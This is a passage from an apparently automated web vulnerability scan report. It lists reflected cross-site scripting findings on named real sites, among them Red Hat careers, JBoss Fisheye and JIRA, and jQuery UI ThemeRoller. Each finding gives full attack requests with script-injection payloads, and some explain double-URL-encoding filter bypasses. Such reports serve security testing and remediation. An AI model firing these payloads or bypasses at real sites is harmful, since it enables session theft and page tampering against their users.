Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ext/search?act=list&Keyword=jboss&Category=d2c76"-alert(1)-"5322cc6fab2&Location= HTTP/1.1 Host: careers.redhat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 16:11:29 GMT Cache-Control: private Content-Length: 50329 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDSSACDQST=DDDDAEJAEJJHHICMKIIEIIPC; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>redhat.com Careers</title> ...[SNIP]... <script> function Submit_Query_Jtitle() { window.location= "/ext/search?act=list&Sortedby=JobTitle&SortDir=Asc&Category=d2c76"-alert(1)-"5322cc6fab2&Location=&Keyword=jboss&SearchJobID=&PostalCode=&DistanceUnit=&SearchRadius="; } function Submit_Query_Location() { window.location= "/ext/search?act=list&Sortedby=Location&SortDir=Asc&Category ...[SNIP]...
The value of the queryEncoded request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef39'%3balert(1)//6e03cdf3cdc was submitted in the queryEncoded parameter. This input was echoed as 6ef39';alert(1)//6e03cdf3cdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the emailAddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52342"><script>alert(1)</script>817de34b9e88d53ed was submitted in the emailAddress parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
4.108. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Home
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a8f51--><script>alert(1)</script>db69e0aef33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:25:26 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289841926516 Set-Cookie: JSESSIONID=20A4F26984442A3D698F78937A8D5972; Path=/ Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 38262
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3ab9ffe0 adaptavist.builder.helper: com.atlass ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b95d<script>alert(1)</script>6a1369cd27b was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/p.json?callback=_ate.ad.hpr7b95d<script>alert(1)</script>6a1369cd27b HTTP/1.1 Host: ds.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Sun, 13 Feb 2011 06:29:43 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 15 Nov 2010 06:29:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Nov 2010 06:29:43 GMT Connection: close
4.110. http://fisheye.jboss.org/browse [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fisheye.jboss.org
Path:
/browse
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bf3"><script>alert(1)</script>2948a8d6823 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse?e5bf3"><script>alert(1)</script>2948a8d6823=1 HTTP/1.1 Host: fisheye.jboss.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://fisheye.jboss.org/browse/ Cookie: FESESSIONID=8s2yaeqmbqpv16w8nsad69bey; crucibleprefs1="D%3D1289838739500%3Bslp%3Dt";
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:39:41 GMT Server: Jetty(6.1.24) Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 33437
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
4.111. http://fisheye.jboss.org/browse/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fisheye.jboss.org
Path:
/browse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e81b"><script>alert(1)</script>239ec7c39ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/?6e81b"><script>alert(1)</script>239ec7c39ac=1 HTTP/1.1 Host: fisheye.jboss.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:39:35 GMT Server: Jetty(6.1.24) Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 33439
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b was submitted in the REST URL parameter 2. This input was echoed as 1b441"><script>alert(1)</script>06c6c8f234b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /changelog/~feedspan1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b=1mo,feedmax=50/Seam HTTP/1.1 Host: fisheye.jboss.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:35:14 GMT Server: Jetty(6.1.24) Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 324712
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308 was submitted in the REST URL parameter 2. This input was echoed as a6f00"><script>alert(1)</script>e171f9e0308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /changelog/~feedspana6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308=1mo,feedmax=50/weld HTTP/1.1 Host: fisheye.jboss.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:35:17 GMT Server: Jetty(6.1.24) Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 305553
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0544"><img%20src%3da%20onerror%3dalert(1)>be18d6c294f was submitted in the REST URL parameter 1. This input was echoed as e0544"><img src=a onerror=alert(1)>be18d6c294f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /toolse0544"><img%20src%3da%20onerror%3dalert(1)>be18d6c294f/scrollable.html HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Mon, 15 Nov 2010 17:33:55 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Vary: Accept-Encoding Cache-control: private Content-Length: 5899
Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <body id="toolse0544"><img src=a onerror=alert(1)>be18d6c294f_scrollable" class="msie tools"> ...[SNIP]...
The value of the error request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84984</script><script>alert(1)</script>cd92040e158 was submitted in the error parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account.php?page=login&error=84984</script><script>alert(1)</script>cd92040e158 HTTP/1.1 Host: home.vembu.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: vhbsc=bvvf4kfqpt8c7u7r1prvh56in2;
Response
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 06:57:03 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="google-site-ve ...[SNIP]... display","none"); //$("#message").css("display","block"); // $("#message_container").css("position","static"); //$("#message").css("width","979px");
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f1ba"%3balert(1)//575707e5323 was submitted in the mpck parameter. This input was echoed as 9f1ba";alert(1)//575707e5323 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e733"%3balert(1)//2ab4c249393 was submitted in the mpvc parameter. This input was echoed as 5e733";alert(1)//2ab4c249393 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the keys request parameter is copied into the HTML document as plain text between tags. The payload 1f82f<script>alert(1)</script>d55a495333 was submitted in the keys parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the username request parameter is copied into the HTML document as plain text between tags. The payload 1bcd4<script>alert(1)</script>d253e6aeae3 was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaffd"><script>alert(1)</script>539f0945265 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /secureaaffd"><script>alert(1)</script>539f0945265/QuickSearch.jspa HTTP/1.1 Host: jira.jboss.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=054235C303669934768F68853A63ADCC;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 14:30:44 GMT Server: Apache-Coyote/1.1 X-AREQUESTID: 570x995774x1 X-ASESSIONID: 3jsbox Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-AUSERNAME: anonymous Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Connection: close Content-Length: 124457
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c21"><script>alert(1)</script>e0a91ab37f6 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff63c21"><script>alert(1)</script>e0a91ab37f6&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1123d"><script>alert(1)</script>9442397b621 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee1123d"><script>alert(1)</script>9442397b621&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ede7"><script>alert(1)</script>8a535ef4e7f was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f63ede7"><script>alert(1)</script>8a535ef4e7f&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af686"><script>alert(1)</script>36e7921bdd9 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900af686"><script>alert(1)</script>36e7921bdd9&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42612"><script>alert(1)</script>8e5b70fa715 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a82842612"><script>alert(1)</script>8e5b70fa715&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7e59"><script>alert(1)</script>5ae29252980 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45ca7e59"><script>alert(1)</script>5ae29252980&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ce5"><script>alert(1)</script>6c8eb05e3fb was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
